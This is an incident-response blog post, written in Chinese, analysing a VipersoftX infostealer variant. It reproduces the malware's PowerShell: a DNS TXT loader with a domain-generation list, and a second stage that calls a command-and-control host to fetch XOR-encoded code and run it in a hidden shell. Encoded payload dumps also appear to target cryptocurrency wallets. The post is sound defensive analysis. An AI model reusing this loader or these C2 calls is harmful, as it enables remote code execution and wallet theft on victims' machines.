一次应急引发的VipersoftX窃密木马变种分析

VipersoftX窃密木马变种技战法分析

Posted by Ga0weI on May 22, 2024

0x01 背景

前两周处理一个应急的时候发现的一个VipersoftX变种,并且整个分析过程还算闭环,所以记录下;

0x02 分析过程:

通过外联域名bideo-schnellvpn,初步判断是VenomSoftX窃密木马活动事件,并且受害机器在ids设备上触发了大量普通远控木马和窃密木马事件,大概率存在样本;

安装sysmon 收集日志;

通过sysmon日志 找到外联进程及相关信息;

image-20240515145606841

一、往后排查确认受影响相关:

定位进程参数:

image-20240515145636352

拿到恶意脚本:

image-20240511110201758

分析脚本,获取指定注册表键值执行:《HKEY_LOCAL_MACHINE\SOFTWARE\SolidWorks CorporationJQVQJ\c8dO7TYiv》

image-20240511110308539

内容如下:

image-20240511110749003

提取分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
'EF616CBA-13C3-48EF-82CF-E7523A6A628F';
$ms = [IO.MemoryStream]::new();

function Get-Updates {
    param (
        $hostname
    )
    try {
        $dns = Resolve-DnsName -Name $hostname -Type 'TXT' 
        $ms.SetLength(0);
        $ms.Position = 0;
        foreach ($txt in $dns) {
            try {
                if ($txt.Type -ne 'TXT') {
                    continue;
                }
                $pkt = [string]::Join('', $txt.Strings);
                if ($pkt[0] -eq '.') {
                    $dp = ([type]((([regex]::Matches('trevnoC','.','RightToLeft') | ForEach {$_.value}) -join ''))).GetMethods()[306].Invoke($null, @(($pkt.Substring(1).Replace('_', '+'))));
                    $ms.Position = [BitConverter]::ToUInt32($dp, 0);
                    $ms.Write($dp, 4, $dp.Length - 4);
                }
            }
            catch {
            }
        }

        if ($ms.Length -gt 136) {
            $ms.Position = 0;
            $sig = [byte[]]::new(128);
            $timestamp = [byte[]]::new(8);
            $buffer = [byte[]]::new($ms.Length - 136);
            $ms.Read($sig, 0, 128) | Out-Null;
            $ms.Read($timestamp, 0, 8) | Out-Null;
            $ms.Read($buffer, 0, $buffer.Length) | Out-Null;
            $pubkey = [Security.Cryptography.RSACryptoServiceProvider]::new();
	    [byte[]]$bytarr = 6,2,0,0,0,164,0,0,82,83,65,49,0,4,0,0,1,0,1,0,171,136,19,139,215,31,169,242,133,11,146,105,79,13,140,88,119,0,2,249,79,17,77,152,228,162,31,56,117,89,68,182,194,170,250,16,3,78,104,92,37,37,9,250,164,244,195,118,92,190,58,20,35,134,83,10,229,114,229,137,244,178,10,31,46,80,221,73,129,240,183,9,245,177,196,77,143,71,142,60,5,117,241,54,2,116,23,225,145,53,46,21,142,158,206,250,181,241,8,110,101,84,218,219,99,196,195,112,71,93,55,111,218,209,12,101,165,45,13,36,118,97,232,193,245,221,180,169
            $pubkey.ImportCspBlob($bytarr);
            if ($pubkey.VerifyData($buffer, [Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256'), $sig)) {
                return @{
                    timestamp = ([System.BitConverter]::ToUInt64($timestamp, 0));
                    text      = ([Text.Encoding]::UTF8.GetString($buffer));
                };
            } 
        }
    }
    catch {
    }
    return $null;
}

while ($true) {
    try {
        $update = @{
            timestamp = 0;
            text      = '';            
        };
        foreach ($c in (@("com", "xyz"))) {
            foreach ($a in (@("wmail", "fairu", "bideo", "privatproxy", "ahoravideo"))) {
                foreach ($b in (@("endpoint", "blog", "chat", "cdn", "schnellvpn"))) {
                    try {
                        $h = "$a-$b.$c";
                        $r = Get-Updates $h
                        if ($null -ne $r) {
                            if ($r.timestamp -gt $update.timestamp) {
                                $update = $r;
                            }
                        }
                    }
                    catch {
                    }
                }
            }
        }

        if ($update.text) {
            $job = Start-Job -ScriptBlock ([scriptblock]::Create($update.text));
            $job | Wait-Job -Timeout 14400;
            $job | Stop-Job;
        }
    }
    catch {
    }
    Start-Sleep -Seconds 30;
}

上述代码大致逻辑从 dns请求解析一个a.b.c域名的txt记录,a:(“endpoint”, “blog”, “chat”, “cdn”, “schnellvpn”),b:(“wmail”, “fairu”, “bideo”, “privatproxy”, “ahoravideo”),c:(“com”, “xyz”)

对获取的txt记录进行“解码” —>内置rsa公钥签名校验—>反射运行代码

如下是捕获的一次的txt记录:

1
 .AAAAAF2h8B8FKoLc38oeIg9JiF4tNC1u0p_41R4rzJRxwGx5yVJJVi7GcLZ4MaDf5Z8BZJaJq0EkKWnrDp2DwuXItSmk7qR63ZLM0gw5vUhcbFe4tPmn8VSc1fxDar3vZ_uMM/VlWxDx3JXhdI79/aNR7XVvpGmW_zTJ0o3eQ3TmiXr/gbNapplb3AhbU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlNIQTI1Nl0kc2hhID0gW1NlY3VyaXR5LkNyeXB0b2dyYXBoeS5TSEEyNTZdOjpDcmVhdGUoKQ0KJG1hY2d1aWQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSAoKChbcmVnZXhdOjpNYXRjaGVzKCd5aHBhcmdvdHB5ckNcdGZvc29yY2lNXEVSQVdURk9TXDpNTEtIJywnLics;type: 16 .BAYAACAgICAgICAgJHAuU3RhbmRhcmRJbnB1dC5Xcml0ZUxpbmUoJycpOyAgDQogICAgICAgICAgICAkcC5XYWl0Rm9yRXhpdCgpOw0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIH0gDQogICAgfSANCiAgICBjYXRjaCB7DQogICAgfSANCiAgICBTdGFydC1TbGVlcCAyDQp9DQo=;type: 16 .aAIAAGlkKSkgfCBGb3JFYWNoLU9iamVjdCBUb1N0cmluZyBYMikgLWpvaW4gJyc7DQp3aGlsZSAoJHRydWUpIHsgDQogICAgdHJ5IHsgDQogICAgICAgICRyID0gSW52b2tlLVJlc3RNZXRob2QgLVVyaSAiaHR0cDovL3hib3h3aW5kb3dzLmNvbS9hcGkvdjEvJCgkZ3VpZCkiDQogICAgICAgIGlmICgkciAtbmUgJycpIHsgDQogICAgICAgICAgICAkYnVmID0gW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRyKTsNCiAgICAgICAgICAgIGZvciAoJGkgPSAwOyAkaSAtbHQgJGJ1Zi5MZW5ndGg7ICRpKyspIHsNCiAgICAgICAgICAgICAgICAkYnVm;type: 16 .nAMAAFskaV0gPSAkYnVmWyRpXSAtYnhvciAyMjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgICRsaW5lcyA9IFtUZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRidWYpLlNwbGl0KCJgcmBuIik7DQogICAgICAgICAgICAkcCA9IFtEaWFnbm9zdGljcy5Qcm9jZXNzXTo6bmV3KCk7DQogICAgICAgICAgICAkcC5TdGFydEluZm8uV2luZG93U3R5bGUgPSAnSGlkZGVuJzsNCiAgICAgICAgICAgICRwLlN0YXJ0SW5mby5GaWxlTmFtZSA9ICdwb3dlcnNoZWxsLmV4ZSc7DQogICAgICAgICAgICAkcC5TdGFydEluZm8uVXNlU2hlbGxFeGVj;type: 16 .0AQAAHV0ZSA9ICRmYWxzZTsNCiAgICAgICAgICAgICRwLlN0YXJ0SW5mby5SZWRpcmVjdFN0YW5kYXJkSW5wdXQgPSAkdHJ1ZTsNCiAgICAgICAgICAgICRwLlN0YXJ0SW5mby5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0ID0gJHRydWU7DQogICAgICAgICAgICAkcC5TdGFydCgpOw0KICAgICAgICAgICAgJHAuQmVnaW5PdXRwdXRSZWFkTGluZSgpOw0KICAgICAgICAgICAgZm9yZWFjaCAoJGxpbmUgaW4gJGxpbmVzKSB7DQogICAgICAgICAgICAgICAgJHAuU3RhbmRhcmRJbnB1dC5Xcml0ZUxpbmUoJGxpbmUpOyAgDQogICAgICAgICAgICB9DQogICAg;type: 16 .NAEAACdSaWdodFRvTGVmdCcpIHwgRm9yRWFjaCB7JF8udmFsdWV9KSAtam9pbiAnJykpIC1OYW1lIE1hY2hpbmVHdWlkKS5NYWNoaW5lR1VJRDsNCiR1c2VyaWQgPSAiJCgkZW52OlVTRVJET01BSU4pJCgkZW52OlVTRVJOQU1FKSQoJGVudjpQUk9DRVNTT1JfUkVWSVNJT04pJCgkZW52OlBST0NFU1NPUl9JREVOVElGSUVSKSQoJGVudjpQUk9DRVNTT1JfTEVWRUwpJCgkZW52Ok5VTUJFUl9PRl9QUk9DRVNTT1JTKSQoJG1hY2d1aWQpIjsNCiRndWlkID0gKCRzaGEuQ29tcHV0ZUhhc2goW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCR1c2Vy;

简单处理,去除.之后多条合并:

1
AAAAAF2h8B8FKoLc38oeIg9JiF4tNC1u0p_41R4rzJRxwGx5yVJJVi7GcLZ4MaDf5Z8BZJaJq0EkKWnrDp2DwuXItSmk7qR63ZLM0gw5vUhcbFe4tPmn8VSc1fxDar3vZ_uMM/VlWxDx3JXhdI79/aNR7XVvpGmW_zTJ0o3eQ3TmiXr/gbNapplb3AhbU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlNIQTI1Nl0kc2hhID0gW1NlY3VyaXR5LkNyeXB0b2dyYXBoeS5TSEEyNTZdOjpDcmVhdGUoKQ0KJG1hY2d1aWQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSAoKChbcmVnZXhdOjpNYXRjaGVzKCd5aHBhcmdvdHB5ckNcdGZvc29yY2lNXEVSQVdURk9TXDpNTEtIJywnLicsBAYAACAgICAgICAgJHAuU3RhbmRhcmRJbnB1dC5Xcml0ZUxpbmUoJycpOyAgDQogICAgICAgICAgICAkcC5XYWl0Rm9yRXhpdCgpOw0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIH0gDQogICAgfSANCiAgICBjYXRjaCB7DQogICAgfSANCiAgICBTdGFydC1TbGVlcCAyDQp9DQo=aAIAAGlkKSkgfCBGb3JFYWNoLU9iamVjdCBUb1N0cmluZyBYMikgLWpvaW4gJyc7DQp3aGlsZSAoJHRydWUpIHsgDQogICAgdHJ5IHsgDQogICAgICAgICRyID0gSW52b2tlLVJlc3RNZXRob2QgLVVyaSAiaHR0cDovL3hib3h3aW5kb3dzLmNvbS9hcGkvdjEvJCgkZ3VpZCkiDQogICAgICAgIGlmICgkciAtbmUgJycpIHsgDQogICAgICAgICAgICAkYnVmID0gW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRyKTsNCiAgICAgICAgICAgIGZvciAoJGkgPSAwOyAkaSAtbHQgJGJ1Zi5MZW5ndGg7ICRpKyspIHsNCiAgICAgICAgICAgICAgICAkYnVmnAMAAFskaV0gPSAkYnVmWyRpXSAtYnhvciAyMjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgICRsaW5lcyA9IFtUZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRidWYpLlNwbGl0KCJgcmBuIik7DQogICAgICAgICAgICAkcCA9IFtEaWFnbm9zdGljcy5Qcm9jZXNzXTo6bmV3KCk7DQogICAgICAgICAgICAkcC5TdGFydEluZm8uV2luZG93U3R5bGUgPSAnSGlkZGVuJzsNCiAgICAgICAgICAgICRwLlN0YXJ0SW5mby5GaWxlTmFtZSA9ICdwb3dlcnNoZWxsLmV4ZSc7DQogICAgICAgICAgICAkcC5TdGFydEluZm8uVXNlU2hlbGxFeGVj0AQAAHV0ZSA9ICRmYWxzZTsNCiAgICAgICAgICAgICRwLlN0YXJ0SW5mby5SZWRpcmVjdFN0YW5kYXJkSW5wdXQgPSAkdHJ1ZTsNCiAgICAgICAgICAgICRwLlN0YXJ0SW5mby5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0ID0gJHRydWU7DQogICAgICAgICAgICAkcC5TdGFydCgpOw0KICAgICAgICAgICAgJHAuQmVnaW5PdXRwdXRSZWFkTGluZSgpOw0KICAgICAgICAgICAgZm9yZWFjaCAoJGxpbmUgaW4gJGxpbmVzKSB7DQogICAgICAgICAgICAgICAgJHAuU3RhbmRhcmRJbnB1dC5Xcml0ZUxpbmUoJGxpbmUpOyAgDQogICAgICAgICAgICB9DQogICAgNAEAACdSaWdodFRvTGVmdCcpIHwgRm9yRWFjaCB7JF8udmFsdWV9KSAtam9pbiAnJykpIC1OYW1lIE1hY2hpbmVHdWlkKS5NYWNoaW5lR1VJRDsNCiR1c2VyaWQgPSAiJCgkZW52OlVTRVJET01BSU4pJCgkZW52OlVTRVJOQU1FKSQoJGVudjpQUk9DRVNTT1JfUkVWSVNJT04pJCgkZW52OlBST0NFU1NPUl9JREVOVElGSUVSKSQoJGVudjpQUk9DRVNTT1JfTEVWRUwpJCgkZW52Ok5VTUJFUl9PRl9QUk9DRVNTT1JTKSQoJG1hY2d1aWQpIjsNCiRndWlkID0gKCRzaGEuQ29tcHV0ZUhhc2goW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCR1c2Vy

_替换成+,并且base64解码:如下图:

image-20240511172123535

取前128位,为签名数据,使用内置公钥解签名验证;

取128-136位,为时间戳

image-20240511172346615

签名:

1
000000005da1f01f052a82dcdfca1e220f49885e2d342d6ed29e35478af3251c701b1e725492558bb19c2d9e0c6837f967c05925a26ad0490a5a7ac3a760f0b9722d4a693ba91eb764b334830e6f52171b15ee2d3e69fc5527357f10daaf7bd9b8c33f5655b10f1dc95e1748efdfda351ed756fa46996cd3274a37790dd39a25

时间戳:

1
ebfe06cd6a9a656f

转换标准时间戳:/10000000

image-20240511173016677

image-20240511173046159

时间戳时间是:23年11月21日;

138之后的都是之后要执行的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
[Security.Cryptography.SHA256]$sha = [Security.Cryptography.SHA256]::Create()
$macguid = (Get-ItemProperty ((([regex]::Matches('yhpargotpyrC\tfosorciM\ERAWTFOS\:MLKH','.',....        $p.StandardInput.WriteLine('');  
            $p.WaitForExit();
            break;
        } 
    } 
    catch {
    } 
    Start-Sleep 2
}

$userid = "$($env:USERDOMAIN)$($env:USERNAME)$($env:PROCESSOR_REVISION)$($env:PROCESSOR_IDENTIFIER)$($env:PROCESSOR_LEVEL)$($env:NUMBER_OF_PROCESSORS)$($macguid)";
$guid = ($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($userid)) | ForEach-Object ToString X2) -join '';
while ($true) { 
    try { 
        $r = Invoke-RestMethod -Uri "http://xboxwindows.com/api/v1/$($guid)"
        if ($r -ne '') { 
            $buf = [Convert]::FromBase64String($r);
            for ($i = 0; $i -lt $buf.Length; $i++) {
                $buf....[$i] = $buf[$i] -bxor 22;
            }
            $lines = [Text.Encoding]::ASCII.GetString($buf).Split("`r`n");
            $p = [Diagnostics.Process]::new();
            $p.StartInfo.WindowStyle = 'Hidden';
            $p.StartInfo.FileName = 'powershell.exe';
            $p.StartInfo.UseShellExecÐ...ute = $false;
            $p.StartInfo.RedirectStandardInput = $true;
            $p.StartInfo.RedirectStandardOutput = $true;
            $p.Start();
            $p.BeginOutputReadLine();
            foreach ($line in $lines) {
                $p.StandardInput.WriteLine($line);  
            }
    4...'RightToLeft') | ForEach {$_.value}) -join '')) -Name MachineGuid).MachineGUID;

捕获的另一个:

image-20240511173824216

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
....[$i] = $buf[$i] -bxor 22;
            }
            $lines = [Text.Encoding]::ASCII.GetString($buf).Split("`r`n");
            $p = [Diagnostics.Process]::new();
            $p.StartInfo.WindowStyle = 'Hidden';
            $p.StartInfo.FileName = 'powershell.exe';
            $p.StartInfo.UseShellExech...id)) | ForEach-Object ToString X2) -join '';
while ($true) { 
    try { 
        $r = Invoke-RestMethod -Uri "http://xboxwindows.com/api/v1/$($guid)"
        if ($r -ne '') { 
            $buf = [Convert]::FromBase64String($r);
            for ($i = 0; $i -lt $buf.Length; $i++) {
                $buf4...'RightToLeft') | ForEach {$_.value}) -join '')) -Name MachineGuid).MachineGUID;
$userid = "$($env:USERDOMAIN)$($env:USERNAME)$($env:PROCESSOR_REVISION)$($env:PROCESSOR_IDENTIFIER)$($env:PROCESSOR_LEVEL)$($env:NUMBER_OF_PROCESSORS)$($macguid)";
$guid = ($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($user....        $p.StandardInput.WriteLine('');  
            $p.WaitForExit();
            break;
        } 
    } 
    catch {
    } 
    Start-Sleep 2
}
....]¡ð..*.ÜßÊ.".I.^-4-nÒ.¸Õ.+Ì.qÀlyÉRIV.Æp¶x1 ßå..d..«A$)ië...Âåȵ)¤î¤zÝ.ÌÒ.9½H\lW¸´ù§ñT.ÕüCj½ïgë.3õe[.ñÜ.át.ýý£Qíuo¤i.û4ÉÒ.ÞCtæ.zÿ.³Z¦.[Ü.[Security.Cryptography.SHA256]$sha = [Security.Cryptography.SHA256]::Create()
$macguid = (Get-ItemProperty ((([regex]::Matches('yhpargotpyrC\tfosorciM\ERAWTFOS\:MLKH','.',Ð...ute = $false;
            $p.StartInfo.RedirectStandardInput = $true;
            $p.StartInfo.RedirectStandardOutput = $true;
            $p.Start();
            $p.BeginOutputReadLine();
            foreach ($line in $lines) {
                $p.StandardInput.WriteLine($line);  
            }
    

如下图:只要当前时间戳大于那个23年11月的时间戳,开始一个进程运行上述对应的代码,每隔4个小时运行一次:

image-20240511174144235

参考捕获的第一txt记录,还原出来的二阶段代码逻辑:

获取相关环境变量和特定注册表值(计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid),生成一个guid,访问http://xboxwindows.com/api/v1/$($guid)拉取样本:

拉取之后xor 22解密使用powershell运行;

代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
[Security.Cryptography.SHA256]$sha = [Security.Cryptography.SHA256]::Create()
$macguid = (Get-ItemProperty ((([regex]::Matches('yhpargotpyrC\tfosorciM\ERAWTFOS\:MLKH','.',....        $p.StandardInput.WriteLine('');  
            $p.WaitForExit();
            break;
        } 
    } 
    catch {
    } 
    Start-Sleep 2
}

$userid = "$($env:USERDOMAIN)$($env:USERNAME)$($env:PROCESSOR_REVISION)$($env:PROCESSOR_IDENTIFIER)$($env:PROCESSOR_LEVEL)$($env:NUMBER_OF_PROCESSORS)$($macguid)";
$guid = ($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($userid)) | ForEach-Object ToString X2) -join '';
while ($true) { 
    try { 
        $r = Invoke-RestMethod -Uri "http://xboxwindows.com/api/v1/$($guid)"
        if ($r -ne '') { 
            $buf = [Convert]::FromBase64String($r);
            for ($i = 0; $i -lt $buf.Length; $i++) {
                $buf[$i] = $buf[$i] -bxor 22;
            }
            $lines = [Text.Encoding]::ASCII.GetString($buf).Split("`r`n");
            $p = [Diagnostics.Process]::new();
            $p.StartInfo.WindowStyle = 'Hidden';
            $p.StartInfo.FileName = 'powershell.exe';
            $p.StartInfo.UseShellExecÐ...ute = $false;
            $p.StartInfo.RedirectStandardInput = $true;
            $p.StartInfo.RedirectStandardOutput = $true;
            $p.Start();
            $p.BeginOutputReadLine();
            foreach ($line in $lines) {
                $p.StandardInput.WriteLine($line);  
            }
    4...'RightToLeft') | ForEach {$_.value}) -join '')) -Name MachineGuid).MachineGUID;

获取一个userid:

1
/7C190B4B451B891DF4A0CE4E2C2FEB559756FD0DAC7199D50D8B32E54FBC3ABA

发起请求,提取响应:

image-20240511183405508

1
2{sbwIdsgcseb6+61L$@&_U/~uQ}`r|S`X$[nYBTXQ_&XBPYR}nLQO&OBT|LBDz[{[oL{@XBC#XlC$L{GaLQP|XlS#YAG'[QG"O|[oLBC&L{\|[$POETyr^DaZlSc[G&]wQ/lrRyqsQ\`s^rft{D`r%[cO$/bRGf|t$#cLAX&wA/cYTdLA@aZAPewNLzRGf~O$Xzu^GbLA#|t$Dft{u _Qr wNWXUxqbL{/or$PoLQ@}ZAL`u|yq[BWlZ|S'[E"nXl_c[|GXU{X{ZN\~sByqYRqo[Br}LB\|L{_&YQ_"[E'yw$uXUxqbL{/or$PoLQ@}ZNTot%D`YTyr^DaRGf|L'$wNXfrQ/oYT!_xX|wQ@bLE_ _{~&r^WpG&]rNXzu'~L$@crRyqtA/ wAneOE.'Z|Wq]^rft{D`r%[qtxGq[BWc[Reqr$zcX|G!_^q$XRequxO [B_'Z|Wf_QrzO$b`Zl_a[BWa[BWn_QLfu{@{t%q`[B_'Z|WXU{P|O$@arRyqrQ@"rU/yrQ'eZQPauQnfO$P&wA/cZ%~yrQ'e]%~btUn~u^TewAX~rQz`t/"tAa!uB&aZ|}ewA'~L$C`ONLfLnftAPxLE/%LA\aZUy`]|bnFBWcYW&]OAX|LNT&ZAn~t{r'OArzYT wU'|tn wRbnFBWcYUn wU'&rlbnFBWcXon wU'ywlbnFBWcXEnzt''ulbnFBWc[onzt|bnFBWc[q&]rNTxu{P}LE'ftxXzO%@oLE'oLNP'LNX&ulyq[G&]O$ObO$/ct{@|rQzcLo'fuRyq[BWlZ|S'[E"nXl_c[|GXU{X}t'et$/aYT|tQ/'LQLeON\zRGf|L'fuQX`rA#&ux} _Q~dRGyXUq++1-2{sbwI`sdeyx6+6./&/"#.#.-2{sbwIqcr6+6'&#  $-2{sbwI{cbsn6+61 $%ppt&&;t&p#;"& /;w..t;"r '$s.&ut'$1-2{sbwIf6+61' $8'#.8'!/8'$&1-2{sbwI~yeb6+61ntynaxryae8uy{1-55555555555555555555555555552udswbsrXsa6+62pwzes-2{cbsn6+6MEoebs{8B~dswrxq8[cbsnK,,xsa>2bdcs:62{sbwI{cbsn:6MdspK2udswbsrXsa?-p6>2udswbsrXsa6;sg62pwzes?6m6666Ebwdb;Ezssf6;Esuyxre6%&&-6666dsbcdx-k2I~swrsde6+6MBsnb8SxuyrxqK,,WEU__8QsbEbdxq>>MbofsK>>>MdsqsnK,,[wbu~se>1bds`xyU1:181:1Dq~bByZspb1?6j6PydSwu~6m2I8`wzcsk?6;|yx611???8Qsb[sb~yre>?M%& K8_x`y}s>2xczz:6V>>2{sbwIdsgcseb????6;efzb64vdvx42~bbfIdsgcseb6+6Vmk-62~bbfI~swrsde6+6Vmk-2~bbfIdsgcseb8fwb~6+6>2I~swrsdeM&K6;efzb6161?M'K-pyd6>26+6'-626;zb62I~swrsde8Zsxqb~-62==?6m6666MebdxqMKK2~6+62I~swrsdeM2K6;efzb61,61-6666p6>2~8Zsxqb~6;zb6$?6m66666666tdsw}-6666k66662~bbfI~swrsdeM2~M&KK6+62~M'K-k2eseeyx6+6Vmk-2eseeyx8r6+6;'-2eseeyx8cfrwbs6+62bdcs-Wrr;Bofs6;Wees{tzoXw{s6Eoebs{8Xsb8^bbf2uzsxb6+6MEoebs{8Xsb8^bbf8^bbfUzsxbK,,xsa>?-2uzsxb8B{sycb6+6MB{sEfwxK,,Pdy{[xcbse>$?-2uzsxb8TwesWrrdsee6+6MCdK,,xsa>4~bbf,992>2{sbwI~yeb?4?-pcxubyx6Bseb;Cxuyrs6m6666fwdw{6>666666662ebd6666?6666pyd6>26+6&-626;zb62ebd8Zsxqb~-62==?6m66666666p6>2ebdM2K6;qb6$##?6m666666666666dsbcdx62bdcs-66666666k6666k6666dsbcdx62pwzes-k2eswdu~Fwb~e6+6V>666642sx`,CESDFDYP_ZSJRse}byf4:666642sx`,CESDFDYP_ZSJYxsRd`sJRse}byf4:6666>MSx`dyx{sxbK,,QsbPyzrsdFwb~>4Rse}byf4??:666642sx`,FCTZ_UJRse}byf4:666642sx`,WZZCESDEFDYP_ZSJ[udyeypbJAxryaeJEbwdb6[sxcJFdyqdw{e4:666642sx`,WFFRWBWJ[udyeypbJAxryaeJEbwdb6[sxcJFdyqdw{e4:666642sx`,WFFRWBWJ[udyeypbJ_xbsdxsb6SnfzydsdJGcu}6Zwcxu~JCesd6FxxsrJBwe}Twd4?-2eswdu~Sxbdse6+6V>6666Mfeuceby{yt|subKVm66666666dyyb6666+613wffrwbw3166666666bwdqsbe6+66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Snyrce;W1666666666666fwb~6+61Snyrce166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Wby{u;W1666666666666fwb~6+61Wby{u6Awzzsb166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Szsubdc{;W1666666666666fwb~6+61Szsubdc{166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Zsrqsd;W1666666666666fwb~6+61Zsrqsd6Z`s166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61\wnn;W1666666666666fwb~6+61\wnn6Ztsdbo166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61uy{8ztsdbo8|wnn;W1666666666666fwb~6+61uy{8ztsdbo8|wnn166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Qcwdrw;W1666666666666fwb~6+61Qcwdrw166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Wd{ydo;W1666666666666fwb~6+61Wd{ydo166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61RSZBW;W1666666666666fwb~6+61RSZBW166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61BDSLYD;W1666666666666fwb~6+61BDSLYD6Tdrqs166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Tbuyx;W1666666666666fwb~6+61Tbuyx166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61txwxus;W1666666666666fwb~6+61txwxus166666666k6666k:6666Mfeuceby{yt|subKVm66666666dyyb6666+613zyuwzwffrwbw3166666666bwdqsbe6+66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Tzyu}ebdsw{;W1666666666666fwb~6+61Tzyu}ebdsw{6Qdssx166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Uyxy{;W1666666666666fwb~6+61Uyxy{166666666k6666k:6666Mfeuceby{yt|subKVm66666666dyyb6666+613zyuwzwffrwbw3JQyyqzsJU~dy{sJCesd6RwbwJRspwczbJSnbsxeyxe166666666bwdqsbe6+66666666Mfeuceby{yt|subKVm666666666666xw{s6+61[sbw{we};U1666666666666fwb~6+61x}t~ptsyqwswys~zspx}yrtspqfq}xx166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61[SAun;U1666666666666fwb~6+61xzt{xx|uxzsq}||fup|uz{upqqpspr{166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Uyx/.;U1666666666666fwb~6+61wswu~}x{spf~sfuuyxtyy~u}yxyss{q166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Txwxus;U1666666666666fwb~6+61p~ty~{wszty~f|ttzruxquxwfxryr|f166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61\wnn;U1666666666666fwb~6+61u|szpfzfzstr||sxzzf|utz{|}puppxs166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Uyxtwes;U1666666666666fwb~6+61~xpwx}xyupsyptrrqu|x{~xpx}rxwwr166666666k6666k:6666Mfeuceby{yt|subKVm66666666dyyb6666+613zyuwzwffrwbw3J[udyeypbJSrqsJCesd6RwbwJRspwczbJSnbsxeyxe166666666bwdqsbe6+66666666Mfeuceby{yt|subKVm666666666666xw{s6+61[sbw{we};S1666666666666fwb~6+61s|twztw}yfzu~zq~surwz{sssw|x{~{166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Uyxy{;S1666666666666fwb~6+61q{uyuzwqsw}}t}ttpzff}tf|ut}upsrq166666666k6666k:6666Mfeuceby{yt|subKVm66666666dyyb6666+613zyuwzwffrwbw3JTdw`sEypbawdsJTdw`s;TdyaesdJCesd6RwbwJRspwczbJSnbsxeyxe166666666bwdqsbe6+66666666Mfeuceby{yt|subKVm666666666666xw{s6+61[sbw{we};T1666666666666fwb~6+61x}t~ptsyqwswys~zspx}yrtspqfq}xx166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61[SAun;T1666666666666fwb~6+61xzt{xx|uxzsq}||fup|uz{upqqpspr{166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Uyx/.;T1666666666666fwb~6+61wswu~}x{spf~sfuuyxtyy~u}yxyss{q166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Txwxus;T1666666666666fwb~6+61p~ty~{wszty~f|ttzruxquxwfxryr|f166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61\wnn;T1666666666666fwb~6+61u|szpfzfzstr||sxzzf|utz{|}puppxs166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61Uyxtwes;T1666666666666fwb~6+61~xpwx}xyupsyptrrqu|x{~xpx}rxwwr166666666k6666k:6666Mfeuceby{yt|subKVm66666666dyyb6666+613Eoebs{Rd`s3166666666bwdqsbe6+66666666Mfeuceby{yt|subKVm666666666666xw{s6+61]ssFwee;W1666666666666fwb~6+61Fdyqdw{6Pzse6>n. ?J]ssFwee6Fweeaydr6Ewps6$J]ssFwee8sns8uyxpq166666666k:66666666Mfeuceby{yt|subKVm666666666666xw{s6+61]ssFwee;T1666666666666fwb~6+61Fdyqdw{6PzseJ]ssFwee6Fweeaydr6Ewps6$J]ssFwee8sns8uyxpq166666666k6666k:666666Mfeuceby{yt|subKVm66666666dyyb6666+613zyuwzwffrwbw3166666666bwdqsbe6+66666666Mfeuceby{yt|subKVm666666666666xw{s6+61'Fweeaydr1666666666666fwb~6+61'Fweeaydr166666666k6666k?-pcxubyx6Qsb;_xebwzzEbwbce6m6666fwdw{6>